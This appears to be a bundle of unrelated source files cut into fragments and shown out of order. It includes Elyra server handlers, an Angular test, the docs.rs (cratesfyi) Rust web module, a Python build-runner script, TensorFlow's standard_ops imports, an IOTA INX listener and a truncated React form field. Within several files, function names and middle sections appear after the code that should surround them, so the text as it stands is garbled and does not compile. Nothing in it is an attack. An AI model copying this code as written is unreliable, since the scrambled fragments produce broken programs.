def initialize_handlers(self): schemaspace_regex = r"(?P<schemaspace>[\w\.\-]+)" resource_regex = r"(?P<resource>[\w\.\-]+)" path_regex = r"(?P<path>(?:(?:/[^/]+)+|/?))" # same as jupyter server and will include a leading slash processor_regex = r"(?P<processor>[\w]+)" component_regex = r"(?P<component_id>[\w\.\-:]+)" self.handlers.extend([ (f'/{self.name}/{YamlSpecHandler.get_resource_metadata()[0]}', YamlSpecHandler), (f'/{self.name}/metadata/{schemaspace_regex}', MetadataHandler), (f'/{self.name}/metadata/{schemaspace_regex}/{resource_regex}', MetadataResourceHandler), (f'/{self.name}/schema/{schemaspace_regex}', SchemaHandler), (f'/{self.name}/schema/{schemaspace_regex}/{resource_regex}', SchemaResourceHandler), (f'/{self.name}/schemaspace', SchemaspaceHandler), (f'/{self.name}/schemaspace/{schemaspace_regex}', SchemaspaceResourceHandler), (f'/{self.name}/pipeline/schedule', PipelineSchedulerHandler), (f'/{self.name}/pipeline/export', PipelineExportHandler), (f'/{self.name}/pipeline/components/{processor_regex}', PipelineComponentHandler), (f'/{self.name}/pipeline/components/{processor_regex}/{component_regex}/properties', PipelineComponentPropertiesHandler), (f'/{self.name}/contents/properties{path_regex}', ContentHandler), (f'/{self.name}/elyra/pipeline/validate', PipelineValidationHandler), ]) def initialize_settings(self): self.log.info('Config {}'.format(self.config)) # Instantiate singletons with appropriate parent to enable configurability, and convey # root_dir to PipelineProcessorManager. PipelineProcessorRegistry.instance(root_dir=self.settings['server_root_dir'], parent=self) PipelineProcessorManager.instance(root_dir=self.settings['server_root_dir'], parent=self) PipelineValidationManager.instance(root_dir=self.settings['server_root_dir'], parent=self) FileMetadataCache.instance(parent=self) SchemaManager.instance(parent=self) def
(self): pass launch_instance = ElyraApp.launch_instance
initialize_templates
country-measures-popup.component.spec.ts
import { async, ComponentFixture, TestBed } from '@angular/core/testing'; import { CountryMeasuresPopupComponent } from './country-measures-popup.component'; describe('CountryMeasuresPopupComponent', () => { let component: CountryMeasuresPopupComponent; let fixture: ComponentFixture<CountryMeasuresPopupComponent>; beforeEach(async(() => { TestBed.configureTestingModule({
})); beforeEach(() => { fixture = TestBed.createComponent(CountryMeasuresPopupComponent); component = fixture.componentInstance; fixture.detectChanges(); }); it('should create', () => { expect(component).toBeTruthy(); }); });
declarations: [ CountryMeasuresPopupComponent ] }) .compileComponents();
mod.rs
//! Web interface of cratesfyi pub mod page; /// ctry! (cratesfyitry) is extremely similar to try! and itry! /// except it returns an error page response instead of plain Err. macro_rules! ctry { ($result:expr) => (match $result { Ok(v) => v, Err(e) => { return super::page::Page::new(format!("{:?}", e)).title("An error has occured") .set_status(::iron::status::BadRequest).to_resp("resp"); } }) } /// cexpect will check an option and if it's not Some /// it will return an error page response macro_rules! cexpect { ($option:expr) => (match $option { Some(v) => v, None => { return super::page::Page::new("Resource not found".to_owned()) .title("An error has occured") .set_status(::iron::status::BadRequest).to_resp("resp"); } }) } /// Gets an extension from Request macro_rules! extension { ($req:expr, $ext:ty) => ( cexpect!($req.extensions.get::<$ext>()) ) } mod rustdoc; mod releases; mod crate_details; mod source; mod pool; mod file; mod builds; mod error; mod sitemap; use std::env; use std::error::Error; use std::time::Duration; use std::path::PathBuf; use iron::prelude::*; use iron::{Handler, status}; use iron::headers::{CacheControl, CacheDirective, ContentType}; use router::{Router, NoRoute}; use staticfile::Static; use handlebars_iron::{HandlebarsEngine, DirectorySource}; use time; use postgres::Connection; use semver::{Version, VersionReq}; use rustc_serialize::json::{Json, ToJson}; use std::collections::BTreeMap; /// Duration of static files for staticfile and DatabaseFileHandler (in seconds) const STATIC_FILE_CACHE_DURATION: u64 = 60 * 60 * 24 * 30 * 12; // 12 months const STYLE_CSS: &'static str = include_str!(concat!(env!("OUT_DIR"), "/style.css")); const OPENSEARCH_XML: &'static [u8] = include_bytes!("opensearch.xml"); struct CratesfyiHandler { router_handler: Box<Handler>, database_file_handler: Box<Handler>, static_handler: Box<Handler>, } impl CratesfyiHandler { fn chain<H: Handler>(base: H) -> Chain { // TODO: Use DocBuilderOptions for paths let mut hbse = HandlebarsEngine::new(); hbse.add(Box::new(DirectorySource::new("./templates", ".hbs"))); // load templates if let Err(e) = hbse.reload() { panic!("Failed to load handlebar templates: {}", e.description()); } let mut chain = Chain::new(base); chain.link_before(pool::Pool::new()); chain.link_after(hbse); chain } pub fn new() -> CratesfyiHandler { let mut router = Router::new(); router.get("/", releases::home_page, "index"); router.get("/style.css", style_css_handler, "style_css"); router.get("/about", |_: &mut Request| page::Page::new(false).title("About Docs.rs").to_resp("about"), "about"); router.get("/robots.txt", sitemap::robots_txt_handler, "robots_txt"); router.get("/sitemap.xml", sitemap::sitemap_handler, "sitemap_xml"); router.get("/opensearch.xml", opensearch_xml_handler, "opensearch_xml"); router.get("/releases", releases::releases_handler, "releases"); router.get("/releases/feed", releases::releases_feed_handler, "releases_feed"); router.get("/releases/recent/:page", releases::releases_handler, "releases_recent_page"); router.get("/releases/stars", releases::stars_handler, "releases_stars"); router.get("/releases/stars/:page", releases::stars_handler, "releases_stars_page"); router.get("/releases/:author", releases::author_handler, "releases_author"); router.get("/releases/:author/:page", releases::author_handler, "releases_author_page"); router.get("/releases/activity", releases::activity_handler, "releases_activity"); router.get("/releases/search", releases::search_handler, "releases_search"); 
router.get("/releases/queue", releases::build_queue_handler, "releases_queue"); router.get("/crate/:name", crate_details::crate_details_handler, "crate_name"); router.get("/crate/:name/", crate_details::crate_details_handler, "crate_name_"); router.get("/crate/:name/:version", crate_details::crate_details_handler, "crate_name_version"); router.get("/crate/:name/:version/", crate_details::crate_details_handler, "crate_name_version_"); router.get("/crate/:name/:version/builds", builds::build_list_handler, "crate_name_version_builds"); router.get("/crate/:name/:version/builds.json", builds::build_list_handler, "crate_name_version_builds_json"); router.get("/crate/:name/:version/builds/:id", builds::build_list_handler, "crate_name_version_builds_id"); router.get("/crate/:name/:version/source/", source::source_browser_handler, "crate_name_version_source"); router.get("/crate/:name/:version/source/*", source::source_browser_handler, "crate_name_version_source_"); router.get("/:crate", rustdoc::rustdoc_redirector_handler, "crate"); router.get("/:crate/", rustdoc::rustdoc_redirector_handler, "crate_"); router.get("/:crate/badge.svg", rustdoc::badge_handler, "crate_badge"); router.get("/:crate/:version", rustdoc::rustdoc_redirector_handler, "crate_version"); router.get("/:crate/:version/", rustdoc::rustdoc_redirector_handler, "crate_version_"); router.get("/:crate/:version/search-index.js", rustdoc::rustdoc_html_server_handler, "crate_version_search_index_js"); router.get("/:crate/:version/settings.html", rustdoc::rustdoc_html_server_handler, "crate_version_settings_html"); router.get("/:crate/:version/all.html", rustdoc::rustdoc_html_server_handler, "crate_version_all_html"); router.get("/:crate/:version/aliases.js", rustdoc::rustdoc_html_server_handler, "crate_version_aliases_js"); router.get("/:crate/:version/:target", rustdoc::rustdoc_redirector_handler, "crate_version_target"); router.get("/:crate/:version/:target/", rustdoc::rustdoc_html_server_handler, "crate_version_target_"); router.get("/:crate/:version/:target/*.html", rustdoc::rustdoc_html_server_handler, "crate_version_target_html"); let router_chain = Self::chain(router); let prefix = PathBuf::from(env::var("CRATESFYI_PREFIX").unwrap()).join("public_html"); let static_handler = Static::new(prefix) .cache(Duration::from_secs(STATIC_FILE_CACHE_DURATION)); CratesfyiHandler { router_handler: Box::new(router_chain), database_file_handler: Box::new(file::DatabaseFileHandler), static_handler: Box::new(static_handler), } } } impl Handler for CratesfyiHandler { fn handle(&self, req: &mut Request) -> IronResult<Response> { // try router first then db/static file handler // return 404 if none of them return Ok self.router_handler .handle(req) .or_else(|e| { // if router fails try to serve files from database first self.database_file_handler.handle(req).or(Err(e)) }) .or_else(|e| { // and then try static handler. 
if all of them fails, return 404 self.static_handler.handle(req).or(Err(e)) }) .or_else(|e| { debug!("{}", e.description()); let err = if let Some(err) = e.error.downcast::<error::Nope>() { *err } else if e.error.downcast::<NoRoute>().is_some() { error::Nope::ResourceNotFound } else { panic!("all cratesfyi errors should be of type Nope"); }; Self::chain(err).handle(req) }) } } fn match_version(conn: &Connection, name: &str, version: Option<&str>) -> Option<String> { // version is an Option<&str> from router::Router::get // need to decode first use url::percent_encoding::percent_decode; let req_version = version.and_then(|v| { match percent_decode(v.as_bytes()).decode_utf8() { Ok(p) => Some(p.into_owned()), Err(_) => None, } }) .map(|v| if v == "newest" || v == "latest" { "*".to_owned() } else { v }) .unwrap_or("*".to_string()); let versions = { let mut versions = Vec::new(); let rows = conn.query("SELECT versions FROM crates WHERE name = $1", &[&name]).unwrap(); if rows.len() == 0 { return None; } let versions_json: Json = rows.get(0).get(0); for version in versions_json.as_array().unwrap() { let version: String = version.as_string().unwrap().to_owned(); versions.push(version); } versions }; // first check for exact match // we can't expect users to use semver in query for version in &versions { if version == &req_version { return Some(version.clone()); } } // Now try to match with semver let req_sem_ver = match VersionReq::parse(&req_version) { Ok(v) => v, Err(_) => return None, }; // we need to sort versions first let versions_sem = { let mut versions_sem: Vec<Version> = Vec::new(); for version in &versions { // in theory a crate must always have a semver compatible version // but check result just in case let version = match Version::parse(&version) { Ok(v) => v, Err(_) => return None, }; versions_sem.push(version); } versions_sem.sort(); versions_sem.reverse(); versions_sem }; // semver is acting weird for '*' (any) range if a crate only have pre-release versions // return first version if requested version is '*' if req_version == "*" && !versions_sem.is_empty() { return Some(format!("{}", versions_sem[0])); } for version in &versions_sem { if req_sem_ver.matches(&version) { return Some(format!("{}", version)); } } None } /// Wrapper around the Markdown parser and renderer to render markdown fn render_markdown(text: &str) -> String { use comrak::{markdown_to_html, ComrakOptions}; let options = { let mut options = ComrakOptions::default(); options.ext_superscript = true; options.ext_table = true; options.ext_autolink = true; options.ext_tasklist = true; options.ext_strikethrough = true; options }; markdown_to_html(text, &options) } /// Returns latest version if required version is not the latest /// req_version must be an exact version fn latest_version(versions_json: &Vec<String>, req_version: &str) -> Option<String> { let req_version = match Version::parse(req_version) { Ok(v) => v, Err(_) => return None, }; let versions = { let mut versions: Vec<Version> = Vec::new(); for version in versions_json { let version = match Version::parse(&version) { Ok(v) => v, Err(_) => return None, }; versions.push(version); } versions.sort(); versions.reverse(); versions }; if req_version != versions[0] { for i in 1..versions.len() { if req_version == versions[i] { return Some(format!("{}", versions[0])) } } } None } /// Starts cratesfyi web server pub fn start_web_server(sock_addr: Option<&str>) { let cratesfyi = CratesfyiHandler::new(); 
Iron::new(cratesfyi).http(sock_addr.unwrap_or("localhost:3000")).unwrap(); } /// Converts Timespec to nice readable relative time string fn duration_to_str(ts: time::Timespec) -> String { let tm = time::at(ts); let delta = time::now() - tm; if delta.num_days() > 5 { format!("{}", tm.strftime("%b %d, %Y").unwrap()) } else if delta.num_days() > 1 { format!("{} days ago", delta.num_days()) } else if delta.num_days() == 1 { "one day ago".to_string() } else if delta.num_hours() > 1 { format!("{} hours ago", delta.num_hours()) } else if delta.num_hours() == 1 { "an hour ago".to_string() } else if delta.num_minutes() > 1 { format!("{} minutes ago", delta.num_minutes()) } else if delta.num_minutes() == 1 { "one minute ago".to_string() } else if delta.num_seconds() > 0 { format!("{} seconds ago", delta.num_seconds()) } else { "just now".to_string() } } fn style_css_handler(_: &mut Request) -> IronResult<Response> { let mut response = Response::with((status::Ok, STYLE_CSS)); let cache = vec![CacheDirective::Public, CacheDirective::MaxAge(STATIC_FILE_CACHE_DURATION as u32)]; response.headers.set(ContentType("text/css".parse().unwrap())); response.headers.set(CacheControl(cache)); Ok(response) } fn opensearch_xml_handler(_: &mut Request) -> IronResult<Response> { let mut response = Response::with((status::Ok, OPENSEARCH_XML)); let cache = vec![CacheDirective::Public, CacheDirective::MaxAge(STATIC_FILE_CACHE_DURATION as u32)]; response.headers.set(ContentType("application/opensearchdescription+xml".parse().unwrap())); response.headers.set(CacheControl(cache)); Ok(response) } /// MetaData used in header #[derive(Debug)] pub struct MetaData { pub name: String, pub version: String, pub description: Option<String>, pub target_name: Option<String>, pub rustdoc_status: bool, } impl MetaData { pub fn
(conn: &Connection, name: &str, version: &str) -> Option<MetaData> { for row in &conn.query("SELECT crates.name, releases.version, releases.description, releases.target_name, releases.rustdoc_status FROM releases INNER JOIN crates ON crates.id = releases.crate_id WHERE crates.name = $1 AND releases.version = $2", &[&name, &version]) .unwrap() { return Some(MetaData { name: row.get(0), version: row.get(1), description: row.get(2), target_name: row.get(3), rustdoc_status: row.get(4), }); } None } } impl ToJson for MetaData { fn to_json(&self) -> Json { let mut m: BTreeMap<String, Json> = BTreeMap::new(); m.insert("name".to_owned(), self.name.to_json()); m.insert("version".to_owned(), self.version.to_json()); m.insert("description".to_owned(), self.description.to_json()); m.insert("target_name".to_owned(), self.target_name.to_json()); m.insert("rustdoc_status".to_owned(), self.rustdoc_status.to_json()); m.to_json() } } #[cfg(test)] mod test { extern crate env_logger; use super::*; #[test] #[ignore] fn test_start_web_server() { // FIXME: This test is doing nothing let _ = env_logger::init(); start_web_server(None); } #[test] fn test_latest_version() { let versions = vec!["1.0.0".to_string(), "1.1.0".to_string(), "0.9.0".to_string(), "0.9.1".to_string()]; assert_eq!(latest_version(&versions, "1.1.0"), None); assert_eq!(latest_version(&versions, "1.0.0"), Some("1.1.0".to_owned())); assert_eq!(latest_version(&versions, "0.9.0"), Some("1.1.0".to_owned())); assert_eq!(latest_version(&versions, "invalidversion"), None); } }
from_crate
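The duration_to_str helper above buckets an age into either an absolute date (older than five days) or a coarse "N units ago" string. A small Go sketch of the same bucketing, using only the standard library; it mirrors the thresholds shown, not the exact cratesfyi output.

package main

import (
	"fmt"
	"time"
)

// relativeTime renders a timestamp with the same bucketing as duration_to_str:
// an absolute date once it is more than five days old, otherwise a coarse
// "N units ago" string.
func relativeTime(t time.Time) string {
	d := time.Since(t)
	switch {
	case d > 5*24*time.Hour:
		return t.Format("Jan 02, 2006")
	case d > 48*time.Hour:
		return fmt.Sprintf("%d days ago", int(d.Hours()/24))
	case d > 24*time.Hour:
		return "one day ago"
	case d > 2*time.Hour:
		return fmt.Sprintf("%d hours ago", int(d.Hours()))
	case d > time.Hour:
		return "an hour ago"
	case d > 2*time.Minute:
		return fmt.Sprintf("%d minutes ago", int(d.Minutes()))
	case d > time.Minute:
		return "one minute ago"
	case d > 0:
		return fmt.Sprintf("%d seconds ago", int(d.Seconds()))
	default:
		return "just now"
	}
}

func main() {
	fmt.Println(relativeTime(time.Now().Add(-3 * time.Hour))) // "3 hours ago"
}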
example.py
import os import shutil import subprocess runinfo_fname = os.path.abspath('./example.runinfo') output_directory = os.path.abspath('./runfiles/output/') if os.path.isdir(output_directory): shutil.rmtree(output_directory, ignore_errors=True) print('making {}'.format(output_directory)) os.mkdir(output_directory) print('Directory exists: {}'.format(os.path.isdir(output_directory)))
verbose_fname = os.path.join(output_directory, 'example.verbose') done_file = os.path.join(output_directory, 'example.done') cmd = "rm -f %s; %s %s >> %s; echo Done! >> %s" % (done_file, path_to_trainpredict, runinfo_fname, verbose_fname, done_file) process_id = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = process_id.communicate() print('Directory exists: {}'.format(os.path.isdir(output_directory))) if err or not os.path.isfile(done_file): print('Error: while executing command:\n{}'.format(cmd)) print(err) else: print('Done!') print('Directory exists: {}'.format(os.path.isdir(output_directory)))
path_to_trainpredict = os.path.abspath('../build/src/cpp/score_shuffle')
standard_ops.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=unused-import """Import names of Tensor Flow standard Ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import sys as _sys # pylint: disable=g-bad-import-order # Imports the following modules so that @RegisterGradient get executed. from tensorflow.python.ops import array_grad from tensorflow.python.ops import cudnn_rnn_grad from tensorflow.python.ops import data_flow_grad from tensorflow.python.ops import manip_grad from tensorflow.python.ops import math_grad from tensorflow.python.ops import sparse_grad from tensorflow.python.ops import spectral_grad from tensorflow.python.ops import state_grad from tensorflow.python.ops import tensor_array_grad from tensorflow.python.util.all_util import remove_undocumented # go/tf-wildcard-import # pylint: disable=wildcard-import from tensorflow.python.ops.array_ops import * from tensorflow.python.ops.check_ops import * from tensorflow.python.ops.clip_ops import * from tensorflow.python.ops.special_math_ops import * # TODO(vrv): Switch to import * once we're okay with exposing the module. 
from tensorflow.python.ops.confusion_matrix import confusion_matrix from tensorflow.python.ops.control_flow_ops import Assert from tensorflow.python.ops.control_flow_ops import case from tensorflow.python.ops.control_flow_ops import cond from tensorflow.python.ops.control_flow_ops import group from tensorflow.python.ops.control_flow_ops import no_op from tensorflow.python.ops.control_flow_ops import tuple # pylint: disable=redefined-builtin # pylint: enable=redefined-builtin from tensorflow.python.ops.control_flow_ops import while_loop from tensorflow.python.ops.data_flow_ops import * from tensorflow.python.ops.functional_ops import * from tensorflow.python.ops.gradients import * from tensorflow.python.ops.histogram_ops import * from tensorflow.python.ops.init_ops import * from tensorflow.python.ops.io_ops import * from tensorflow.python.ops.linalg_ops import * from tensorflow.python.ops.logging_ops import Print from tensorflow.python.ops.logging_ops import get_summary_op from tensorflow.python.ops.logging_ops import timestamp from tensorflow.python.ops.lookup_ops import initialize_all_tables from tensorflow.python.ops.lookup_ops import tables_initializer from tensorflow.python.ops.manip_ops import * from tensorflow.python.ops.math_ops import * from tensorflow.python.ops.numerics import * from tensorflow.python.ops.parsing_ops import * from tensorflow.python.ops.partitioned_variables import * from tensorflow.python.ops.random_ops import * from tensorflow.python.ops.script_ops import py_func from tensorflow.python.ops.session_ops import * from tensorflow.python.ops.sparse_ops import * from tensorflow.python.ops.state_ops import assign from tensorflow.python.ops.state_ops import assign_add from tensorflow.python.ops.state_ops import assign_sub from tensorflow.python.ops.state_ops import count_up_to from tensorflow.python.ops.state_ops import scatter_add from tensorflow.python.ops.state_ops import scatter_div from tensorflow.python.ops.state_ops import scatter_mul from tensorflow.python.ops.state_ops import scatter_sub from tensorflow.python.ops.state_ops import scatter_min from tensorflow.python.ops.state_ops import scatter_max from tensorflow.python.ops.state_ops import scatter_update from tensorflow.python.ops.state_ops import scatter_nd_add from tensorflow.python.ops.state_ops import scatter_nd_sub # TODO(simister): Re-enable once binary size increase due to scatter_nd # ops is under control. 
# from tensorflow.python.ops.state_ops import scatter_nd_mul # from tensorflow.python.ops.state_ops import scatter_nd_div from tensorflow.python.ops.state_ops import scatter_nd_update from tensorflow.python.ops.string_ops import * from tensorflow.python.ops.template import * from tensorflow.python.ops.tensor_array_ops import * from tensorflow.python.ops.variable_scope import * from tensorflow.python.ops.variables import * # pylint: enable=wildcard-import # pylint: enable=g-bad-import-order #### For use in remove_undocumented below: from tensorflow.python.framework import constant_op as _constant_op from tensorflow.python.ops import array_ops as _array_ops from tensorflow.python.ops import check_ops as _check_ops from tensorflow.python.ops import clip_ops as _clip_ops from tensorflow.python.ops import confusion_matrix as _confusion_matrix from tensorflow.python.ops import control_flow_ops as _control_flow_ops from tensorflow.python.ops import data_flow_ops as _data_flow_ops from tensorflow.python.ops import functional_ops as _functional_ops from tensorflow.python.ops import gradients as _gradients from tensorflow.python.ops import histogram_ops as _histogram_ops from tensorflow.python.ops import init_ops as _init_ops from tensorflow.python.ops import io_ops as _io_ops from tensorflow.python.ops import linalg_ops as _linalg_ops from tensorflow.python.ops import logging_ops as _logging_ops from tensorflow.python.ops import manip_ops as _manip_ops from tensorflow.python.ops import math_ops as _math_ops from tensorflow.python.ops import numerics as _numerics from tensorflow.python.ops import parsing_ops as _parsing_ops from tensorflow.python.ops import partitioned_variables as _partitioned_variables from tensorflow.python.ops import random_ops as _random_ops from tensorflow.python.ops import script_ops as _script_ops from tensorflow.python.ops import session_ops as _session_ops from tensorflow.python.ops import sparse_ops as _sparse_ops from tensorflow.python.ops import special_math_ops as _special_math_ops from tensorflow.python.ops import state_ops as _state_ops from tensorflow.python.ops import string_ops as _string_ops from tensorflow.python.ops import template as _template from tensorflow.python.ops import tensor_array_ops as _tensor_array_ops from tensorflow.python.ops import variable_scope as _variable_scope from tensorflow.python.ops import variables as _variables _allowed_symbols_math_ops = [ # TODO(drpng): decide if we want to reference these in the documentation. "reduced_shape", "sparse_segment_mean_grad", "sparse_segment_sqrt_n_grad", # Legacy: will be removed. "arg_max", "arg_min", "lin_space", "sparse_matmul", # Use tf.matmul. # Deprecated (see versions.h): "batch_fft", "batch_fft2d", "batch_fft3d", "batch_ifft", "batch_ifft2d", "batch_ifft3d", "mul", # use tf.multiply instead. "neg", # use tf.negative instead. "sub", # use tf.subtract instead. # These are documented in nn. # We are not importing nn because it would create a circular dependency. "sigmoid", "log_sigmoid", "tanh", ] _allowed_symbols_array_ops = [ # TODO(drpng): make sure they are documented. # Scalars: "NEW_AXIS", "SHRINK_AXIS", "newaxis", # Documented in training.py. # I do not import train, to avoid circular dependencies. # TODO(drpng): this is defined in gen_array_ops, clearly not the right # place. "stop_gradient", # See gen_docs_combined for tf.copy documentation. "copy", ## TODO(drpng): make them inaccessible directly. 
## TODO(drpng): Below, to-doc means that we need to find an appropriate ## documentation section to reference. ## For re-exporting to tf.*: "constant", "edit_distance", # to-doc # From gen_array_ops: "copy_host", # to-doc "immutable_const", # to-doc "invert_permutation", # to-doc "quantize_and_dequantize", # to-doc # TODO(drpng): legacy symbols to be removed. "batch_matrix_diag", "batch_matrix_band_part", "batch_matrix_diag_part", "batch_matrix_set_diag", ] _allowed_symbols_partitioned_variables = [ "PartitionedVariable", # Requires doc link. # Legacy. "create_partitioned_variables", "variable_axis_size_partitioner", "min_max_variable_partitioner", "fixed_size_partitioner", ] _allowed_symbols_control_flow_ops = [ # TODO(drpng): Find a place in the documentation to reference these or # remove. "control_trigger", "loop_cond", "merge", "switch", ] _allowed_symbols_functional_ops = [ "nest", # Used by legacy code. ] _allowed_symbols_gradients = [ # Documented in training.py: # Not importing training.py to avoid complex graph dependencies. "AggregationMethod", "GradientTape", "custom_gradient", "gradients", # tf.gradients = gradients.gradients "hessians", ] _allowed_symbols_clip_ops = [ # Documented in training.py: # Not importing training.py to avoid complex graph dependencies. "clip_by_average_norm", "clip_by_global_norm", "clip_by_norm", "clip_by_value", "global_norm", ] _allowed_symbols_logging_ops = [ # Documented in training.py. # We are not importing training.py to avoid complex dependencies. "audio_summary", "histogram_summary", "image_summary", "merge_all_summaries", "merge_summary", "scalar_summary", # TODO(drpng): link in training.py if it should be documented. "get_summary_op", ] _allowed_symbols_variable_scope_ops = [ "get_local_variable", # Documented in framework package. ] _allowed_symbols_misc = [ "deserialize_many_sparse", "parse_single_sequence_example", "serialize_many_sparse", "serialize_sparse", "confusion_matrix", ] _allowed_symbols = (_allowed_symbols_array_ops + _allowed_symbols_clip_ops + _allowed_symbols_control_flow_ops + _allowed_symbols_functional_ops + _allowed_symbols_gradients + _allowed_symbols_logging_ops + _allowed_symbols_math_ops + _allowed_symbols_variable_scope_ops + _allowed_symbols_misc + _allowed_symbols_partitioned_variables) remove_undocumented(__name__, _allowed_symbols, [ _sys.modules[__name__], _array_ops, _check_ops, _clip_ops, _confusion_matrix, _control_flow_ops, _constant_op, _data_flow_ops, _functional_ops, _gradients, _histogram_ops, _init_ops, _io_ops, _linalg_ops, _logging_ops, _manip_ops, _math_ops, _numerics, _parsing_ops, _partitioned_variables, _random_ops, _script_ops, _session_ops,
_string_ops, _template, _tensor_array_ops, _variable_scope, _variables, ])
_sparse_ops, _special_math_ops, _state_ops,
listener.rs
// Copyright 2022 IOTA Stiftung // SPDX-License-Identifier: Apache-2.0 //! The [`InxListener`] subscribes to events from INX and forwards them via a Tokio unbounded //! channel. use std::{fmt::Debug, marker::PhantomData}; use async_trait::async_trait; use chronicle::runtime::{Actor, ActorContext, ActorError, ConfigureActor, HandleEvent, Report}; use inx::{ client::InxClient, proto::NoParams, tonic::{Channel, Status}, }; use thiserror::Error; use crate::collector::Collector; type BlockStream = InxStreamListener<inx::proto::Block>; type BlockMetadataStream = InxStreamListener<inx::proto::BlockMetadata>; type MilestoneStream = InxStreamListener<inx::proto::Milestone>; #[derive(Debug, Error)] pub enum
{ #[error("the collector is not running")] MissingCollector, #[error("failed to subscribe to stream: {0}")] SubscriptionFailed(#[from] inx::tonic::Status), #[error(transparent)] Runtime(#[from] crate::RuntimeError), } #[derive(Debug)] pub struct InxListener { inx_client: InxClient<Channel>, } impl InxListener { // TODO: Should we check for broker actor here too? pub fn new(inx_client: InxClient<Channel>) -> Self { Self { inx_client } } } #[async_trait] impl Actor for InxListener { type State = (); type Error = StardustInxListenerError; async fn init(&mut self, cx: &mut ActorContext<Self>) -> Result<Self::State, Self::Error> { let block_stream = self.inx_client.listen_to_blocks(NoParams {}).await?.into_inner(); cx.spawn_child::<BlockStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; let metadata_stream = self .inx_client .listen_to_referenced_blocks(NoParams {}) .await? .into_inner(); cx.spawn_child::<BlockMetadataStream, _>( InxStreamListener::default() .with_stream(metadata_stream) .with_registration(false), ) .await; let milestone_stream = self .inx_client .listen_to_confirmed_milestones(inx::proto::MilestoneRangeRequest::from(..)) .await? .into_inner(); cx.spawn_child::<MilestoneStream, _>( InxStreamListener::default() .with_stream(milestone_stream) .with_registration(false), ) .await; Ok(()) } } #[async_trait] impl HandleEvent<Report<BlockStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<BlockStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let block_stream = self.inx_client.listen_to_blocks(NoParams {}).await?.into_inner(); cx.spawn_child::<BlockStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } #[async_trait] impl HandleEvent<Report<BlockMetadataStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<BlockMetadataStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let block_stream = self .inx_client .listen_to_referenced_blocks(NoParams {}) .await? .into_inner(); cx.spawn_child::<BlockMetadataStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } #[async_trait] impl HandleEvent<Report<MilestoneStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<MilestoneStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let milestone_stream = self .inx_client .listen_to_confirmed_milestones(inx::proto::MilestoneRangeRequest::from(..)) .await? 
.into_inner(); cx.spawn_child::<MilestoneStream, _>( InxStreamListener::default() .with_stream(milestone_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } pub struct InxStreamListener<I> { // This funky phantom fn pointer is so that the type impls Send + Sync _item: PhantomData<fn(I) -> I>, } impl<I> Default for InxStreamListener<I> { fn default() -> Self { Self { _item: PhantomData } } } #[async_trait] impl<E> Actor for InxStreamListener<E> where Collector: HandleEvent<E>, E: 'static + Send, { type State = (); type Error = StardustInxListenerError; async fn init(&mut self, _cx: &mut ActorContext<Self>) -> Result<Self::State, Self::Error> { Ok(()) } } #[async_trait] impl<E> HandleEvent<Result<E, Status>> for InxStreamListener<E> where Self: Actor<Error = StardustInxListenerError>, Collector: HandleEvent<E>, E: 'static + Send, { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Result<E, Status>, _state: &mut Self::State, ) -> Result<(), Self::Error> { cx.addr::<Collector>() .await .send(event?) .map_err(|_| StardustInxListenerError::MissingCollector)?; Ok(()) } } impl<I> Debug for InxStreamListener<I> { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("InxStreamListener") .field("item", &std::any::type_name::<I>()) .finish() } }
StardustInxListenerError
field.js
import { AutoSuggestDropdown, DropDown, Label, MobileNumberField, SingleCheckbox, TextField, TextFieldIcon } from "components"; import { AutosuggestContainer } from "egov-ui-framework/ui-containers"; import React from "react"; import { RadioButton } from "../components"; const styles = { radioButtonStyle: { display: 'flex', position: 'inherit', top: '-5px' }, labelStyle: { font: "12px",
marginBottom: 5, marginTop: 14, }, radioButtonItemStyle: { marginBottom: "18px", paddingLeft: "2px", height: "16px", }, selectedLabelStyle: { color: 'rgba(0, 0, 0, 0.44)', }, radioButtonLabelStyle: { // lineHeight: 1, // marginBottom: 8, }, iconStyle: { width: 16, height: 27, }, }; const Field = ({ fieldKey, handleFieldChange, field = {}, disabled, onTextFieldIconClick, ...rest }) => { const renderField = () => { const { type, tooltip, label, hideField, Icon, iconRedirectionURL, visible, ...fieldProps } = field; if (fieldProps.dropDownData && fieldProps.dropDownData.length > 0) { fieldProps.dropDownData.map((data, key) => { fieldProps.dropDownData[key].code = data.value; fieldProps.dropDownData[key].name = data.label; }); } if (hideField) return null; switch (type) { case "textfield": case "textarea": return <TextField {...rest} {...fieldProps} onChange={(e, value) => handleFieldChange(fieldKey, value)} multiLine={type === "textarea"} disabled={disabled || fieldProps.disabled} />; case "mobilenumber": return <MobileNumberField {...rest} {...fieldProps} onChange={(e, value) => handleFieldChange(fieldKey, value)} disabled={disabled || fieldProps.disabled} />; case "number": case "password": return <TextField 